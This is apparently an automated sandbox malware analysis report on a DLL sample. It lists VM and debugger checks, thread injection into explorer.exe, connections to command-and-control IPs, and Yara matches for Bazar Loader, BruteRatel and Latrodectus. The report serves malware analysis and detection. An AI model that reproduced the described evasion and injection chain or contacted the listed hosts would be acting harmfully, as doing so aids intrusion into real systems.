Source: explorer.exe, 0000001E.00000000.1578935505.000000000888E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: explorer.exe, 0000001E.00000003.2292493778.0000000008979000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00`
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\rundll32.exe

API call chain: ExitProcess graph end node

Checks if the current process is being debugged

Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\rundll32.exe

Code function: 23_2_0000029F3B8ECCE0 LdrGetProcedureAddress,

23_2_0000029F3B8ECCE0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00000001800402A0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004A5BC GetProcessHeap,

3_2_000000018004A5BC

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		3_2_00000001800402A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		3_2_000000018005C2BC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 82.115.223.39 8041	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 443
Source: C:\Windows\System32\rundll32.exe	Network Connect: 80.78.24.30 8041	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory allocated: C:\Windows\explorer.exe base: 89D0000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_00007DF49BA40100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,		23_3_00007DF49BA40100
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,		23_2_0000000273F41380

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread created: C:\Windows\explorer.exe EIP: 89D0000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 89D0000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe

Memory written: PID: 3504 base: 89D0000 value: 4D

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7468			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7468			Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 7468 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 89D0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1

Jump to behavior

Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584248652.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000002.2567357911.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanq

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_0000000180053038
Source: C:\Windows\System32\rundll32.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	3_2_0000000180052534
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_0000000180052904
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_00000001800529D4
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	3_2_0000000180048A24
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_0000000180047A78
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_0000000180047BBC
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_0000000180047C44
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0000000180052E38

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180048AB4 GetSystemTimeAsFileTime,

3_2_0000000180048AB4

Source: C:\Windows\System32\rundll32.exe

Code function: 23_2_0000029F3B904D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

23_2_0000029F3B904D00

Source: C:\Windows\explorer.exe

Code function: 30_2_089E00E8 RtlGetVersion,

30_2_089E00E8

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Adds / modifies Windows certificates

Source: C:\Windows\System32\rundll32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Jump to behavior

Stealing of Sensitive Information

Yara detected Bazar Loader

Source: Yara match	File source: 23.2.rundll32.exe.29f3b750000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.29f3b6b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.29f3b750000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BruteRatel

Source: Yara match	File source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
Source: Yara match	File source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Latrodectus

Source: Yara match	File source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3504, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Bazar Loader

Source: Yara match	File source: 23.2.rundll32.exe.29f3b750000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.29f3b6b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.29f3b750000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BruteRatel

Source: Yara match	File source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
Source: Yara match	File source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Latrodectus

Source: Yara match	File source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3504, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Windows Analysis Report
vierm_soft_x64.dll.dll

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1525190
Product:	CloudBasic
Start time:	20:44:06
Start date:	03.10.2024
Sample:	vierm_soft_x64.dll.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b1ca25f5bb4edd293b3711c77eb99a6f
SHA1:	178bba8686ea329b884a652fe0f8a0ae0c53d367
SHA256:	97a6331239d451d7dfe15bfe17de8b419df741ae68bacd440808f8b8d3f99b8a
Filetype:	Win64 Dynamic Link Library (generic) (102004/3) 86.43%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_9d18ffd745e85a2e45f96e262f427525b6e8c80_521fc9a8_c4adbf37-59c1-4825-8620-812c334e58b1\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	9E2254A0413830FD41C7CC35B1CA6B87	A207FCDECC49809DE361145CE2775B7BD52DB971	343BE3CD7541C6272E4DE9CF9EF5DE30FDB8CAC74FC23FAC8065AB763975E2B9
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_b59ea1c308c3a03fedfbb82d3ba77dcda0f14f_521fc9a8_6634b2f7-63a0-4e64-b355-544c896eff14\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	737E598D48A2E5DC5CEF3324B83DB17F	436915A0E54B3DA5E477B6944E6015C193EEC1C0	62B8E8443938D8A5A3F591224F7A230A384E16DC15EE2548CD4C4050EF52CA83
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_b59ea1c308c3a03fedfbb82d3ba77dcda0f14f_521fc9a8_fdc61285-e436-4443-932d-ddd2ea739cae\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	35BE126270E3F69DE03ECCE5A3EAF185	474E899498292B6F65ACFECCD9FE352278D9A8E6	BC7DE070C0DE0C955D278041AA2ACA454155E282E4ADAE77C2472C3750640563
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_b59ea1c308c3a03fedfbb82d3ba77dcda0f14f_521fc9a8_fdf005b5-1a28-4dce-bf44-fb0190b4fbfb\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	4106B9E3AB6EB2205D2BD84BBF22AC64	745CFD5A21B8E2A6A91604ADA42CCD5A91250164	05D0BFCE25FBACA906D082331DB10DFF6CB081A5142BBE0B5ACEF9B166507F0E
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_c6a6fbb15ed5c8cc571154b49674bd13dbd31f5_521fc9a8_71f73fd6-6b3e-4607-9047-6ca8f3853fae\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	9002146B1AA3BA92086308D09BEE8F2C	C7993B48D4859F13AC470B1B7D66956222DA493A	52D0B5B8FEA9538F17B7A70358918EEC6F50E2AFEA153A59CBE81C53BD56CF1A
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_c6a6fbb15ed5c8cc571154b49674bd13dbd31f5_521fc9a8_b6104caa-1983-4b71-878f-bd35263514ce\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	1086BCDCBEF460EA2A4D8A959F1096C4	56D5EB4D35F8305BB45AE7A9860DD44759C49C29	E28DE1C390647B30A2507BB8872C50072768B55E55CBF1CCEE0CF1B035DDB0A6
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C74.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:54 2024, 0x1205a4 type	B8C8DCAA2AB7157AAAB9AB22C74124AF	BB16DD72BAD8A8375257EE28BA6FC33A224AE5BB	4A151D46C5179D65C701AF5C6CC993292F65014D53F12F083EB38777ECF3CE30
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C84.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:54 2024, 0x1205a4 type	D4E6B720329DF0A282D6CAE9000F8624	3BFFEF2D86CB2F3C95F2120D084048465BD4FD77	06E06CCE109DE71F81594863382D456DC02D0C74A3BE465D88813F6173F10857
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D12.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	77DC60C071FDC2E902198E8F29036A4A	18BB6F52EE4889A3B3995C4B3BDB6101A591D4B7	344577E4D04E928DA2D29DDE13B7DAADC9C2F30ECAC740F9161D95FCBB05485C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D42.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	E0D7E9261089575825C1D9D643729273	95EDB180B1B89F32268057AB49534EF2EB6426C1	2CC210957D3AE59D0355EEB9F432785478CFB9278B28397E1D0F77B3A1207B52
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DBF.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	7A125DB64830109BB6C05587F7434C0A	218B6077AFBAD88DC7ACC33595630477272FC444	B517AC6E3A848C1FDE21FFE9413FB8CAEF8E46BE8B472E46ABC89AFE722408FD
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DEE.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	0D23C17D0079AE5E7A0BAB2C67F072C8	A27FB4722DF7136DF57861A7C3E21D38D96A99A6	D50805C3F1D03D1377CAE4B71CB12942C2707E017E23EBD9A789A118CA911557
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6761.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:57 2024, 0x1205a4 type	990796569D66E1CCCC6567A73E4F6286	3CEE9E1D389DB6E2F721B60EA81E813764CEBC49	3B429B1535FE6FE47CD53F433AEED20512B8421E3FFB6D03619ABCCB73F3F7F3
C:\ProgramData\Microsoft\Windows\WER\Temp\WER67A1.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	AC3916582DEBC9EFACDD388D394056E1	524207053F60E6A70ABF95ECF8747C510F1FDE75	164C37ADFE36B0E77401623A26C95863323E53357E224985CF76786BFD71BF64
C:\ProgramData\Microsoft\Windows\WER\Temp\WER67D1.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	8F46B4F144DA74D9B85F9317F2B5AC28	12E68D1F42BBB47CA73BA9CBD41A7826D5F61DA1	C5E6B73D4943D1603B32CBF219F10D4EA7ABCC8F39A7285C35A5259B67240E71
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7367.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:00 2024, 0x1205a4 type	70BBE510900F7C11904E20A030F35912	6BE9EF462D7F1C0FEA85C5035F51A105E30D6DA4	ABF3CFAF70481732A5CDDCA545F9D40E3E62753B3EAC50665BFF64A37F672DC1
C:\ProgramData\Microsoft\Windows\WER\Temp\WER73E5.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	C78DA9EC8BDD916D0400D32C0879CFFD	B16D622F4FB8C466C3E34DE5D2B19E9419C30534	10BF40F7D31BE00795D8044B3EF166611BD83C95DE3AA74C7DE56A3ADE7B26C0
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7444.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	67EB87ACB5405A702CA51007E14D61AB	07B2611A6C3E3C411F2C984FE3F0C7BE05685DBF	AA7367638F223B27F7E5FC188070E7536752353266949AA066C07CDED7BB1A4F
C:\ProgramData\Microsoft\Windows\WER\Temp\WER826B.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:04 2024, 0x1205a4 type	554187D2D452FB77E3802B525B552AE0	0D1AFF52C1A24A73C65DCEC234ED06B7BF98C75F	581989EC2DF32E60C7F01676358110F66CABCDDDCF497E792B9082CEB233055B
C:\ProgramData\Microsoft\Windows\WER\Temp\WER82AA.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:04 2024, 0x1205a4 type	849DEE7EB121FB9FE9F03D5FB32020EB	E296DF7D08675B52F5402092F88BD49DB7039FBF	421CA0FF6B055B5C41005AE12D67B10FE7DDDA0E5098655F0D5046ACCC2349AA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8385.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	9DF31998EF74829F07568A4843055537	B0E27DCD732E28C59E94D5014ACF04C90ACD0F69	78D590A89DFF96B279B8A1214B91C6C4E34D4AE88DD8802C3A0B0232800C770C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8395.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	45EF2E64D232A9EB737669670F4902D6	4D7AB65F31DF36311DFDB4400AC261C6CC10147C	15D15F1489EB0FD664617C879534315CCD49E4E2FFA7813A37741CCB172513BC
C:\ProgramData\Microsoft\Windows\WER\Temp\WER83D5.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	CC5C990C0CE16F846DAF0A6CDC8EEBA8	9AF812000D0BE7B3A6B87FCC2CDA1CEF75289F1F	DE8787F5DC592370D64A51CD99DBA9FD2E4267A1C24195A8112C7152723927E8
C:\ProgramData\Microsoft\Windows\WER\Temp\WER83E4.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	AE1F43150139907FD50E5F9F8C5DDCDE	4B28573E9E52B9DB3E2448EBD294F1AF71E66036	0156EA178C51D92716FF3E7DEDD3F27955C674CE1BA9E5C2A9168F358F16D520
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	85F6B0FFD5794480B2795A7A5CCE4C2E	E9A23DE5B5E6B3CDFA981AEA95B224775F053539	38D311305E96D3A212FF619D9C920E0C1BEA8D319E039C1BBA56B03F75804888

Windows Analysis Report vierm_soft_x64.dll.dll

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
vierm_soft_x64.dll.dll

Malware Threat Intel
Provided by